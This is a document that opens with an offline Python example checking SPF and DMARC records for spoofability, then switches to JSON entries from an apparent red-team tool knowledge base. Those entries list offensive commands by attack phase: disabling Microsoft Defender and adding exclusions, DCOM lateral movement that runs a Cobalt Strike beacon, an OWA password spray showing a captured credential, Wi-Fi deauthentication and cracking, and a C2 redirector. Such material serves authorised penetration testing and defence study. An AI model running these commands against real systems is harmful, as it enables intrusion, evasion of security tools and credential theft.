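spoofcheck reports whether a domain's SPF and DMARC records would stop a forged sender. The Python below is an added example, not spoofcheck's own code, that applies one reading of that decision to constructed TXT records: a DMARC policy of reject or quarantine covering 100% of mail is treated as protective, while SPF weaknesses are reported but do not decide the verdict on their own, because SPF only checks the envelope sender and not the header From a recipient sees. The domains and records are made up and no DNS lookups are performed.

```python
# Constructed TXT records used as offline sample input. A live check would
# query "<domain>" TXT for SPF and "_dmarc.<domain>" TXT for DMARC.
SAMPLE_RECORDS = {
    "hardened.example": ("v=spf1 mx include:_spf.example.net -all",
                         "v=DMARC1; p=reject; rua=mailto:dmarc@hardened.example"),
    "softfail.example": ("v=spf1 ip4:203.0.113.0/24 ~all",
                         "v=DMARC1; p=none; rua=mailto:dmarc@softfail.example"),
    "partial.example":  ("v=spf1 mx -all", "v=DMARC1; p=quarantine; pct=20"),
    "open.example":     ("v=spf1 +all", None),
    "nospf.example":    (None, "v=DMARC1; p=reject"),
}


def spf_all_qualifier(spf):
    """Qualifier of the terminating 'all' mechanism: '+', '-', '~' or '?'.
    Returns None when there is no 'all' term (RFC 7208 then yields neutral)."""
    for term in spf.split():
        t = term.lower()
        if t.lstrip("+-~?") == "all":
            return t[0] if t[0] in "+-~?" else "+"
    return None


def parse_dmarc(record):
    """Split 'v=DMARC1; p=reject; pct=100' into a lowercase-keyed tag dict."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def assess_spoofability(spf, dmarc):
    """Return (spoofable, weaknesses). Decision rule of this example: only
    DMARC p=reject/quarantine on 100% of mail stops a forged header From;
    SPF findings are listed as weaknesses but do not flip the verdict."""
    weaknesses = []
    if spf is None:
        weaknesses.append("no SPF record")
    else:
        q = spf_all_qualifier(spf)
        if q == "~":
            weaknesses.append("SPF ends in ~all (softfail only)")
        elif q == "?":
            weaknesses.append("SPF ends in ?all (neutral)")
        elif q in ("+", None):
            weaknesses.append("SPF has no effective 'all' restriction")
    enforcing = False
    if dmarc is None:
        weaknesses.append("no DMARC record")
    else:
        tags = parse_dmarc(dmarc)
        policy = tags.get("p", "none").lower()
        pct = int(tags.get("pct", "100"))
        if policy not in ("reject", "quarantine"):
            weaknesses.append(f"DMARC policy is p={policy}")
        elif pct < 100:
            weaknesses.append(f"DMARC p={policy} applies to only {pct}% of mail")
        else:
            enforcing = True
    return (not enforcing, weaknesses)


def check_samples(records=SAMPLE_RECORDS):
    """One verdict per domain, the way spoofcheck prints a line per domain."""
    return {d: assess_spoofability(spf, dmarc) for d, (spf, dmarc) in records.items()}


if __name__ == "__main__":
    for domain, (spoofable, why) in check_samples().items():
        print(f"{domain}: {'SPOOFABLE' if spoofable else 'protected'} {why}")
```

The "nospf.example" case is the instructive one: without SPF, legitimate mail can only pass DMARC through DKIM, but a forged message fails both checks and is rejected, so the domain is not spoofable even though the missing SPF record is still reported.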

New tool: Cewl

{
  "name": "Cewl",
  "phases": [
    "01. Initial Access"
  ],
  "category": "",
  "stealthy": false,
  "oss": [
    "Linux"
  ],
  "source": "https://github.com/digininja/CeWL",
  "description": "Password list generator",
  "undetected": [],
  "detected": [],
  "content": "# Cewl\n\n## [[Password Spraying]]\nSpider and build dictionary\n'''\ncewl -w createWordlist.txt https://www.example.com\n'''\n\nAdd minimum password length:\n'''\ncewl -w createWordlist.txt -m 6 https://www.example.com\n'''\n\n\n",
  "commands": [
    {
      "id": "f715c0ee-840f-481c-9999-e8dc102ea5cc",
      "name": "Build dict from web",
      "description": "Spider and build dictionary from website",
      "tag": "",
      "results": [],
      "cmd": "cewl -w createWordlist.txt https://www.example.com"
    },
    {
      "id": "ba34fd28-316f-4d8c-99a2-464b6f5e03e4",
      "name": "Build dict from web min pw length",
      "description": "Spider and build dictionary from website with a minimum password length",
      "tag": "",
      "results": [],
      "cmd": "cewl -w createWordlist.txt -m 6 https://www.example.com"
    }
  ]
}

New tool: PowerShell

{
  "name": "PowerShell",
  "phases": [
    "01. Initial Access",
    "03. Host Enumeration",
    "04. Persistence",
    "05. Privilege Escalation",
    "07. Lateral Movement"
  ],
  "category": "",
  "stealthy": false,
  "platforms": [
    "Windows"
  ],
  "source": "https://learn.microsoft.com/de-de/powershell/?view=powershell-7.3",
  "description": "PowerShell",
  "undetected": [],
  "detected": [],
  "content": "\n\n## [[LSA Protection]]\nWininit event 12 in the System log records whether LSASS was started as a protected process (RunAsPPL).\n`Get-WinEvent -FilterHashtable @{ LogName='system'; Id='12' ; ProviderName='Microsoft-Windows-Wininit' }`\n\n## [[RDP]]\nEvent 1024 lists the outbound RDP connections this host has made (target in the message).\n`Get-WinEvent -FilterHashtable @{ LogName='Microsoft-Windows-TerminalServices-RDPClient/Operational'; id='1024' } | select timecreated, message | ft -AutoSize -Wrap`\n\n## [[COM Hijacking]]\nList COM objects\n`gwmi Win32_COMSetting | ? {$_.progid } | sort | ft ProgId,Caption,InprocServer32`\n\nList COM Object Methods for WScript.Shell.1\n`[activator]::CreateInstance([type]::GetTypeFromProgID(\"WScript.Shell.1\")) | gm`\n\n## [[Unquoted Service Path]]\nGet ACLs of the service binary's directory (BUILTIN\\Users holding Write here is the finding)\n```ps\npowershell Get-Acl -Path \"C:\\Program Files\\Vuln Services\" | fl\n  \nPath   : Microsoft.PowerShell.Core\\FileSystem::C:\\Program Files\\Vuln Services\nOwner  : BUILTIN\\Administrators\nGroup  : wkstn1\\None\nAccess : CREATOR OWNER Allow  FullControl\n NT AUTHORITY\\SYSTEM Allow  FullControl\n BUILTIN\\Administrators Allow  FullControl\n BUILTIN\\Users Allow  Write, ReadAndExecute, Synchronize\n NT SERVICE\\TrustedInstaller Allow  FullControl\n APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES Allow  ReadAndExecute, Synchronize\n APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES Allow  ReadAndExecute, Synchronize\n```\n\n## [[Common Language Runtime (CLR) Versions]]\n```ps\ncmd.exe /c dir %WINDIR%\\Microsoft.Net\\Framework\\ /s /b | find \"System.dll\"\n\n[System.IO.File]::Exists(\"$env:windir\\Microsoft.Net\\Framework\\v2.0.50727\\System.dll\")\n\n[System.IO.File]::Exists(\"$env:windir\\Microsoft.Net\\Framework\\v4.0.30319\\System.dll\")\n```\n\n",
  "commands": [
    {
      "id": "6183749c-eee5-42ca-a171-ac1b1a35a449",
      "name": "Check LSA Protection",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "Get-WinEvent -FilterHashtable @{ LogName='system'; Id='12' ; ProviderName='Microsoft-Windows-Wininit' }"
    },
    {
      "id": "cc43d2fa-b951-4f09-b37f-91f34ea5bbaf",
      "name": "Get RDP Events",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "Get-WinEvent -FilterHashtable @{ LogName='Microsoft-Windows-TerminalServices-RDPClient/Operational'; id='1024' } | select timecreated, message | ft -AutoSize -Wrap"
    },
    {
      "id": "bf3b2a29-c697-4835-aadd-02cf9a14dcbc",
      "name": "List all COM objects via wmi",
      "description": "A lot of output",
      "tag": "",
      "results": [],
      "cmd": "gwmi Win32_COMSetting | ? {$_.progid } | sort | ft ProgId,Caption,InprocServer32"
    },
    {
      "id": "e6685b82-4fa3-4591-bc80-732a64a8cc28",
      "name": "List methods of COM object ",
      "description": "List COM Object Methods for WScript.Shell.1",
      "tag": "",
      "results": [],
      "cmd": "[activator]::CreateInstance([type]::GetTypeFromProgID((\"WScript.Shell.1\"))) | gm"
    },
    {
      "id": "48b78655-db1f-4da0-9d31-f90cc810eb3e",
      "name": "Get ACLs of services",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "powershell Get-Acl -Path \"C:\\Program Files\\Vuln Services\" | fl"
    },
    {
      "id": "5c9766c7-293d-4110-bfeb-0aabfd061080",
      "name": "Get CLR versions",
      "description": "Get Common Language Runtime (CLR) versions",
      "tag": "",
      "results": [],
      "cmd": "cmd.exe /c dir %WINDIR%\\Microsoft.Net\\Framework\\ /s /b | find \"System.dll\"\n\n[System.IO.File]::Exists(\"$env:windir\\Microsoft.Net\\Framework\\v2.0.50727\\System.dll\")\n[System.IO.File]::Exists(\"$env:windir\\Microsoft.Net\\Framework\\v4.0.30319\\System.dll\")"
    },
    {
      "id": "a8516fd7-ce4f-4c19-97c9-780aa299f594",
      "name": "Disable Defender",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "Set-MpPreference -DisableRealtimeMonitoring $true\nSet-MpPreference -DisableBehaviorMonitoring $true\nSet-MpPreference -DisableScriptScanning $true\nSet-MpPreference -DisableArchiveScanning $true",
      "requirements": {
        "tag": "PRIVS:ADMIN"
      }
    },
    {
      "id": "4e5c3ef8-0775-4d8e-af57-a82dc066e524",
      "name": "Get Defender Status",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "Get-MpComputerStatus\nGet-MpPreference"
    },
    {
      "id": "c6a72c8f-0734-4a95-9dfd-241ac41591b5",
      "name": "Defender Exclusions",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "Get-MpPreference | Select-Object -ExpandProperty ExclusionPath\n\nSet-MpPreference -ExclusionPath PATH\\TO\\FOLDER\nSet-MpPreference -ExclusionExtension docx\nSet-MpPreference -ExclusionProcess Process",
      "requirements": {
        "tag": "PRIVS:ADMIN"
      }
    },
    {
      "id": "52121667-91db-4042-910a-ae02121b82f3",
      "name": "Get Defender Detections",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "Get-MpThreatDetection"
    }
  ]
}

New tool: Collector

{
  "name": "Collector",
  "phases": [
    "02. Reconnaissance"
  ],
  "category": "OSINT",
  "stealthy": false,
  "platforms": [
    "Linux"
  ],
  "source": "https://github.com/galihap76/collector",
  "description": "Collector is a OSINT tool and information gathering. This tool can do information gathering phone numbers, github account, ip address and instagram account.",
  "undetected": [],
  "detected": [],
  "content": "\n## [[Passive Reconnaissance]]\n\n",
  "commands": [
    {
      "id": "955ce93e-932e-4e5b-8e7a-8918611697dc",
      "name": "Install",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "git clone https://github.com/galihap76/collector.git\ncd collector \npip install -r requirements.txt\npython3 main.py --update"
    },
    {
      "id": "4875efe7-41e8-4700-b6eb-5413570b57b1",
      "name": "Get info via IP",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "python3 main.py -i <ip address>",
      "requirements": {
        "tag": "INTE"
      }
    },
    {
      "id": "87e07916-e228-4131-b0ee-d6112b46b00f",
      "name": "Get info via Instagram",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "python3 main.py --login -u <YOUR USERNAME> -p <YOUR PASSWORD>\npython3 main.py -ig <target username>"
    }
  ]
}

New tool: ADExplorer

{
  "name": "ADExplorer",
  "phases": [
    "06. Domain Enumeration"
  ],
  "category": "",
  "stealthy": false,
  "oss": [
    "Windows"
  ],
  "source": "https://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer",
  "description": "Active Directory Explorer (AD Explorer) is an advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database, define favorite locations, view object properties and attributes without having to open dialog boxes, edit permissions, view an object's schema, and execute sophisticated searches that you can save and re-execute.",
  "undetected": [
    "Windows Defender (AV)",
    "MDE",
    "Symantec"
  ],
  "detected": [],
  "commands": [
    {
      "id": "5c9c5c1b-543f-4a9e-84d3-dd7b75089cb2",
      "name": "Snapshot of full domain ",
      "description": "Snapshot of full domain, between the \" \" you can specify a target domain",
      "tag": "",
      "results": [],
      "cmd": "ADExplorer.exe -snapshot \"\" outfile.dat"
    },
    {
      "id": "2054d057-9098-4d0c-86c6-97b6fa0d6fb3",
      "name": "Snapshot of full domain from external SMB share",
      "description": "Snapshot of full domain from external SMB share, between the \" \" you can specify a target domain",
      "tag": "",
      "results": [],
      "cmd": "\\\\live.sysinternals.com\\Tools\\ADExplorer.exe -snapshot \"\" <domain_snapshot.dat>\n"
    }
  ],
  "content": ""
}

New tool: ldapsearch

{
  "name": "ldapsearch",
  "phases": [
    "02. Reconnaissance",
    "08. Credentials & User Impersonation"
  ],
  "category": "Enumeration",
  "stealthy": true,
  "platforms": [
    "Linux"
  ],
  "source": "https://linux.die.net/man/1/ldapsearch",
  "description": "Allows you to specify custom LDAP queries",
  "undetected": [],
  "detected": [],
  "content": "# ldapsearch\n\n## [[Validate Credentials]]\n1. Get [[Domain Controller]]\n2. Login\n    '.\\\\ldapsearch.exe -x -h 127.0.0.1 -b dc=maxcrc,dc=com -w PW -D \"cn=admin\"'\n\n3. Flags\n    * x: anonymous connect\n    * h: server\n    * b: root (domain component)\n    * w: password\n    * W: interactive password\n    * D: binddn - user\n\n## [[User enum]]\n> ldapsearch -x -h <ip> -s base\n\n",
  "commands": [
    {
      "id": "f3f95224-0c24-4a55-8c3b-4fea8d7ae490",
      "name": "Login",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": ".\\\\ldapsearch.exe -x -h 127.0.0.1 -b dc=maxcrc,dc=com -w PW -D \"cn=admin\"",
      "requirements": {
        "tag": "INTEL:DOMAIN:DC"
      }
    },
    {
      "id": "e567991e-b395-4f77-ae7c-05961fbfd03d",
      "name": "User enum",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "ldapsearch -x -h <ip> -s base",
      "requirements": {
        "tag": "INTEL:DOMAIN:DC"
      }
    }
  ]
}

New tool: Invoke-DCOM

{
  "name": "Invoke-DCOM",
  "phases": [
    "01. Initial Access",
    "07. Lateral Movement"
  ],
  "category": "",
  "stealthy": false,
  "oss": [
    "Windows"
  ],
  "source": "https://github.com/EmpireProject/Empire/blob/master/data/module_source/lateral_movement/Invoke-DCOM.ps1",
  "description": "Lateral Move via DCOM.",
  "undetected": [],
  "detected": [],
  "content": "# Invoke-DCOM\n\n## [[DCOM]]\n'''\nImport-Module .\\Invoke-DCOM.ps1\nInvoke-DCOM -ComputerName '192.168.2.100' -Method MMC20.Application -Command \"calc.exe\"\nInvoke-DCOM -ComputerName '192.168.2.100' -Method ExcelDDE -Command \"calc.exe\"\nInvoke-DCOM -ComputerName '192.168.2.100' -Method ServiceStart \"MyService\"\n'''\n\nTo interact over Distributed Component Object Model (DCOM), we must use an external tool such as [[Invoke-DCOM]].\n''''''beacon\nbeacon> powershell-import C:\\Tools\\Invoke-DCOM.ps1\nbeacon> powershell Invoke-DCOM -ComputerName srv1 -Method MMC20.Application -Command C:\\Windows\\beacon-smb.exe\nCompleted\n\nbeacon> link srv1\n[+] established link to child beacon: 10.10.1.20\n''''''\n\nDCOM is more complicated to detect, since each \"Method\" works in a different way. In the particular case of 'MMC20.Application', the spawned process will be a child of 'mmc.exe'.\n\n''''''\nProcessId: 952\nImage: C:\\Windows\\beacon-smb.exe\nParentImage: C:\\Windows\\System32\\mmc.exe\n''''''  \nProcesses started via DCOM may also be seen where the parent is 'svchost.exe' (started with the command line '-k DcomLaunch').\n\n",
  "commands": [
    {
      "id": "cfb6398e-d128-41e6-8e25-9f3effdcf564",
      "name": "Import",
      "description": "Import module",
      "tag": "",
      "results": [],
      "cmd": "Import-Module .\\Invoke-DCOM.ps1"
    },
    {
      "id": "ffd4d5ff-e7cf-4621-b07d-f69d9687b635",
      "name": "Execute command via MMC20.Application",
      "description": "Svchost spawns mmc.exe which opens a listening port via RPC binding",
      "tag": "",
      "results": [
        "EXECUTION:REMOTE"
      ],
      "cmd": "Invoke-DCOM -ComputerName '192.168.2.100' -Method MMC20.Application -Command \"calc.exe\"",
      "requirements": {
        "and": [
          {
            "tag": "SERVICE:DCOM"
          },
          {
            "tag": "SERVICE:RPC"
          },
          {
            "tag": "PRIVS:ADMIN"
          }
        ]
      }
    },
    {
      "id": "ded4b315-b2e7-435b-bb11-d21234a1b32c",
      "name": "Execute command via ExcelDDE",
      "description": "",
      "tag": "",
      "results": [
        "EXECUTION:REMOTE"
      ],
      "cmd": "Invoke-DCOM -ComputerName '192.168.2.100' -Method ExcelDDE -Command \"calc.exe\"",
      "requirements": {
        "and": [
          {
            "tag": "SERVICE:DCOM"
          },
          {
            "tag": "SERVICE:RPC"
          },
          {
            "tag": "PRIVS:ADMIN"
          }
        ]
      }
    },
    {
      "id": "16dee6f1-13c1-4e1c-a5e1-52a17830506b",
      "name": "Execute command via ServiceStart ",
      "description": "",
      "tag": "",
      "results": [
        "EXECUTION:REMOTE"
      ],
      "cmd": "Invoke-DCOM -ComputerName '192.168.2.100' -Method ServiceStart \"MyService\"",
      "requirements": {
        "and": [
          {
            "tag": "SERVICE:DCOM"
          },
          {
            "tag": "SERVICE:RPC"
          },
          {
            "tag": "PRIVS:ADMIN"
          }
        ]
      }
    }
  ]
}

New tool: FinalRecon

{
  "name": "FinalRecon",
  "phases": [
    "02. Reconnaissance"
  ],
  "category": "",
  "stealthy": false,
  "platforms": [
    "Python"
  ],
  "source": "https://github.com/thewhiteh4t/FinalRecon",
  "description": "FinalRecon is an automatic web reconnaissance tool written in Python. The goal of FinalRecon is to provide an overview of the target in a short amount of time while maintaining the accuracy of results. Instead of executing several tools one after another, it can provide similar results while keeping dependencies small and simple.",
  "undetected": [],
  "detected": [],
  "content": "## Installation\n'''sh\ngit clone https://github.com/thewhiteh4t/FinalRecon.git\ncd FinalRecon\npip3 install -r requirements.txt\n'''\n\n## [[Passive Reconnaissance]]\n'''sh\npython3 finalrecon.py -h\nusage: finalrecon.py [-h] [--headers] [--sslinfo] [--whois] [--crawl] [--full]\n                     url\n\nFinalRecon - OSINT Tool for All-In-One Web Recon | v1.0.0\n\npositional arguments:\n  url         Target URL\n\noptional arguments:\n  -h, --help  show this help message and exit\n  --headers   Get Header Information\n  --sslinfo   Get SSL Certificate Information\n  --whois     Get Whois Lookup\n  --crawl     Crawl Target Website\n  --full      Get Full Analysis, Test All Available Options\n\n# Check headers\npython3 finalrecon.py --headers <url>\n\n# Check ssl Certificate\npython3 finalrecon.py --sslinfo <url>\n\n# Check whois Information\npython3 finalrecon.py --whois <url>\n\n# Crawl Target\npython3 finalrecon.py --crawl <url>\n\n# full scan\npython3 finalrecon.py --full <url>\n'''\n\n\n",
  "commands": [
    {
      "id": "3f7795a8-a883-450f-900d-6b37c0dd9449",
      "name": "Install",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "git clone https://github.com/thewhiteh4t/FinalRecon.git\ncd FinalRecon\npip3 install -r requirements.txt"
    },
    {
      "id": "3ea5ed52-fa49-4ad3-a7f2-3e7e49b873ae",
      "name": "Check SSL Certificate",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "python3 finalrecon.py --sslinfo <url>"
    },
    {
      "id": "447d2228-3aac-45cf-86aa-35183a405b2c",
      "name": "Check whois Information",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "python3 finalrecon.py --whois <url>"
    },
    {
      "id": "511c55e2-eaef-4a11-9a62-54d74a89736b",
      "name": "Crawl Target",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "python3 finalrecon.py --crawl <url>"
    },
    {
      "id": "787e77cb-9e0b-4164-a58b-210b751f28f1",
      "name": "Full Scan",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "python3 finalrecon.py --full <url>"
    }
  ]
}

New technique: DCOM

{
  "id": "16097d41-d915-4e0a-aa53-d49b24f66995",
  "name": "DCOM",
  "phase": "07. Lateral Movement",
  "ttp": "T1021.003",
  "external": false,
  "description": "DCOM is an extension of COM (Component Object Model), which allows applications to instantiate and access the properties and methods of COM objects on a remote computer just like objects on the local machine using the DCERPC-based DCOM protocol. Information about the identity, the implementation and the configuration of every COM (and DCOM) object is stored in the registry, and associated with a few important identifiers:\n- CLSID - The Class Identifier is a GUID, which acts as a unique identifier for a COM class, and every class registered in Windows is associated with a CLSID (COM objects may be used without registration, but that is beyond the scope of this article). The CLSID key in the registry points to the implementation of the class, using the InProcServer32 subkey in case of a dll-based object, and the LocalServer32 key in case of an exe.\n- ProgID - The Programmatic Identifier is an optional identifier, which can be used as a more user-friendly alternative to a CLSID, as it does not have to adhere to the intimidating GUID format of CLSIDs (\"System.AppDomainManager\", for example, is much easier on the eyes than a GUID). ProgIDs are not guaranteed to be unique, and unlike CLSID, not every class is associated with a ProgID.\n- AppID - The Application Identifier is used to specify the configuration of one or more COM objects associated with the same executable. This includes the permissions given to various groups to instantiate and access the associated classes, both locally and remotely.\n\nThe instantiation of a remote DCOM object behaves as follows:\n1. The client machine requests an instantiation of an object denoted by a CLSID from a remote machine. If the client uses a ProgID, it is first resolved locally to a CLSID.\n2. The remote machine checks if there is an AppID associated with the CLSID in question, and verifies the permissions of the client.\n3. If all goes well, the DCOMLaunch service creates an instance of the requested class, most commonly by running the executable of the LocalServer32 subkey, or by creating a DllHost process to host a dll referenced by the InProcServer32 subkey.\n4. Communication is established between the client application and the server process. In most cases, the new process is created in the session associated with the DCOM communication.\n5. The client can then access the members and methods of the newly created object.",
  "content": "# DCOM\n\n## Cobalt Strike\n-\n\n# Tools\n########\n########",
  "category": "",
  "stealthy": false,
  "changes": [
    "\n## [[Invoke-DCOM]]\n'''\nImport-Module .\\Invoke-DCOM.ps1\nInvoke-DCOM -ComputerName '192.168.2.100' -Method MMC20.Application -Command \"calc.exe\"\nInvoke-DCOM -ComputerName '192.168.2.100' -Method ExcelDDE -Command \"calc.exe\"\nInvoke-DCOM -ComputerName '192.168.2.100' -Method ServiceStart \"MyService\"\n'''\n\nTo interact over Distributed Component Object Model (DCOM), we must use an external tool such as [[Invoke-DCOM]].\n''''''beacon\nbeacon> powershell-import C:\\Tools\\Invoke-DCOM.ps1\nbeacon> powershell Invoke-DCOM -ComputerName srv1 -Method MMC20.Application -Command C:\\Windows\\beacon-smb.exe\nCompleted\n\nbeacon> link srv1\n[+] established link to child beacon: 10.10.1.20\n''''''\n\nDCOM is more complicated to detect, since each \"Method\" works in a different way. In the particular case of 'MMC20.Application', the spawned process will be a child of 'mmc.exe'.\n\n''''''\nProcessId: 952\nImage: C:\\Windows\\beacon-smb.exe\nParentImage: C:\\Windows\\System32\\mmc.exe\n''''''  \nProcesses started via DCOM may also be seen where the parent is 'svchost.exe' (started with the command line '-k DcomLaunch')."
  ],
  "tools": [
    "Invoke-DCOM"
  ],
  "references": [
    "https://www.cybereason.com/blog/dcom-lateral-movement-techniques",
    "https://www.winccoa.com/documentation/WinCCOA/3.18/en_US/Treiber_OPC/opc_c_dcom.html"
  ],
  "steps": [
    {
      "id": "5a71f508-42a9-403a-9dbc-250a1a866b00",
      "name": "Get RCE via DCOM",
      "description": "",
      "requirements": {
        "and": [
          {
            "tag": "SERVICE:DCOM"
          },
          {
            "tag": "SERVICE:RPC"
          },
          {
            "tag": "PRIVS:ADMIN"
          }
        ]
      },
      "results": [
        "EXECUTION:REMOTE"
      ]
    }
  ]
}

New tool: aircrack-ng

{
  "name": "aircrack-ng",
  "phases": [
    "01. Initial Access"
  ],
  "category": "",
  "stealthy": false,
  "oss": [
    "Linux"
  ],
  "source": "https://www.aircrack-ng.org/",
  "description": "Aircrack-ng is a complete suite of tools to assess Wi-Fi network security.",
  "undetected": [],
  "detected": [],
  "content": "# aircrack-ng\n\n'''sh\napt-get install aircrack-ng -y\n'''\n\n## [[WiFi crack]]\n'''sh\n# Put the wireless card into monitor mode (monitor.sh)\nifconfig                           # take the wlan card name\nifconfig name down                 # bring the interface down\niwconfig name mode monitor\nifconfig name up\niwconfig name | grep Mode\n\n# Change MAC\n\n\n# Check whether processes are interfering; if so, kill them\nairmon-ng check name\nkill 1312 (NetworkManager)\nkill 17917 (dhclient)\nkill 1556, 1215, 1216\n\n# Sniff the network\nairodump-ng name\nairodump-ng -c [channel] -w [FILE] --bssid [MAC] name\naireplay-ng -0 0 -a [MAC] name            # deauthenticate continuously\naircrack-ng -w [word list] capture.cap\n\n# Change the network card channel to the router channel\naireplay-ng -0 0 -a [MAC] name            # get channel + MAC (bssid)\niwconfig name channel 6\n'''\n\n\n",
  "commands": [
    {
      "id": "0a82bdb0-4e8d-4dfa-b855-0194965b85a9",
      "name": "Activate monitor mode",
      "description": "Get the interface and put it into monitoring mode",
      "tag": "",
      "results": [],
      "cmd": "ifconfig\nifconfig <if> down\niwconfig <if> mode monitor\nifconfig <if> up\niwconfig <if> | grep Mode"
    },
    {
      "id": "609c27b6-c698-4641-b262-5afbf527920f",
      "name": "Check for interfering processes",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "airmon-ng check <if>"
    },
    {
      "id": "8fac72ec-9855-4a68-a334-024d5303eb07",
      "name": "Sniff network",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "airodump-ng <if>\nairodump-ng -c [channel] -w [FILE] --bssid [MAC] <if>"
    },
    {
      "id": "9969180d-e48a-4a57-8b78-d249bdfee6fd",
      "name": "Deauth device",
      "description": "Deauthenticate a device permanently",
      "tag": "",
      "results": [],
      "cmd": "aireplay-ng -0 0 -a [MAC] <if>"
    },
    {
      "id": "47ad1864-2180-4d2b-9e28-a23c55d1d5dc",
      "name": "Aircrack with wordlist",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "aircrack-ng -w [word list] capture.cap"
    },
    {
      "id": "047b2311-6a3d-4e2d-8e89-fcde97fa3575",
      "name": "Change interface channel",
      "description": "Change network card channel to router channel",
      "tag": "",
      "results": [],
      "cmd": "aireplay-ng -0 0 -a [MAC] <if>\niwconfig <if> channel <6>"
    }
  ]
}

New tool: MDI Check Instance

{
  "name": "MDI Check Instance",
  "phases": [
    "02. Reconnaissance"
  ],
  "category": "",
  "stealthy": true,
  "platforms": [
    "Windows"
  ],
  "source": "https://github.com/thalpius/Microsoft-Defender-for-Identity-Check-Instance",
  "description": "This script gets all accepted domains in Microsoft 365 using autodiscover, gets the tenant name and checks if there is a Microsoft Defender for Identity instance. This way you can figure out if a company runs Microsoft Defender for Identity.",
  "undetected": [],
  "detected": [],
  "commands": [],
  "content": "",
  "references": []
}

New tool: Metasploit

{
  "name": "Metasploit",
  "phases": [
    "02. Reconnaissance"
  ],
  "category": "",
  "stealthy": false,
  "platforms": [
    "Python"
  ],
  "source": "https://www.metasploit.com/",
  "description": "The world’s most used penetration testing framework",
  "undetected": [],
  "detected": [],
  "commands": [
    {
      "id": "4994f588-77be-4a93-aab2-a2e082cd40e4",
      "name": "Get SMB Version",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "use auxiliary/scanner/smb/smb_version"
    },
    {
      "id": "426ada86-74c3-4eca-99ab-b5d561ecd96e",
      "name": "SNMP login",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "use auxiliary/scanner/snmp/snmp_login"
    }
  ],
  "content": "",
  "references": []
}

New tool: MailSniper

{
  "name": "MailSniper",
  "phases": [
    "01. Initial Access",
    "08. Credentials & User Impersonation"
  ],
  "category": "",
  "stealthy": false,
  "platforms": [
    "Windows"
  ],
  "source": "https://github.com/dafthack/MailSniper",
  "description": "MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used as a non-administrative user to search their own email or by an Exchange administrator to search the mailboxes of every user in a domain.",
  "undetected": [],
  "detected": [],
  "content": "\n## [[Internal Phishing]] [[Phishing]]\nGet internal domain names\n''''''\nipmo C:\\Tools\\MailSniper\\MailSniper.ps1\nInvoke-DomainHarvestOWA -ExchHostname 10.10.15.100\n\n[*] Harvesting domain name from the server at 10.10.15.100\nThe domain appears to be: EDU or evil.corp\n''''''\n\nPassword spray\n''''''\nInvoke-PasswordSprayOWA -ExchHostname 10.10.15.100 -UserList .\\valid.txt -Password Summer2022\n\n[*] Now spraying the OWA portal at https://10.10.15.100/owa/\n[*] SUCCESS! User:EDU\\patrick Password:Summer2022\n[*] A total of 1 credentials were obtained.\n''''''\n\n\n",
  "commands": [
    {
      "id": "77b80a4a-d8e9-48aa-b9d1-f201bd7c68ae",
      "name": "Get internal domain names",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "ipmo C:\\Tools\\MailSniper\\MailSniper.ps1\nInvoke-DomainHarvestOWA -ExchHostname 10.10.15.100"
    },
    {
      "id": "90f47a63-a165-4864-a3b1-5ef66ff184ef",
      "name": "Password Spray",
      "description": "",
      "tag": "",
      "results": [
        "CRED:PASS:PLAIN"
      ],
      "cmd": "Invoke-PasswordSprayOWA -ExchHostname 10.10.15.100 -UserList .\\valid.txt -Password Summer2022",
      "requirements": {
        "tag": "SERVICE:OWA"
      }
    }
  ]
}

New tool: AzureC2Relay

{
  "name": "AzureC2Relay",
  "phases": [
    "00. Infrastructure"
  ],
  "category": "",
  "stealthy": false,
  "oss": [
    "Linux"
  ],
  "source": "https://github.com/Flangvik/AzureC2Relay",
  "description": "AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.",
  "undetected": [],
  "detected": [],
  "content": "\n## [[00.Infrastructure/Redirector]]\n\n",
  "commands": [
    {
      "id": "7ea9d673-38f7-4dcf-9edb-ce11f6ec69b2",
      "name": "Deploy Azure function",
      "description": "Spawn a redirector via Azure Functions",
      "tag": "",
      "results": [],
      "cmd": "&([scriptblock]::Create((Invoke-WebRequest -UseBasicParsing 'https://dot.net/v1/dotnet-install.ps1'))) -runtime dotnet -version 3.1.0\nInvoke-WebRequest 'https://releases.hashicorp.com/terraform/0.14.6/terraform_0.14.6_windows_amd64.zip'  -OutFile 'terraform.zip'\nExpand-Archive -Path terraform.zip -DestinationPath \"$([Environment]::GetFolderPath('ApplicationData'))\\TerraForm\\\"\nsetx PATH \"%PATH%;$([Environment]::GetFolderPath('ApplicationData'))\\TerraForm\\\"\nInvoke-WebRequest -Uri https://aka.ms/installazurecliwindows -OutFile .\\AzureCLI.msi; Start-Process msiexec.exe -Wait -ArgumentList '/I AzureCLI.msi /quiet'; rm .\\AzureCLI.msi"
    }
  ]
}

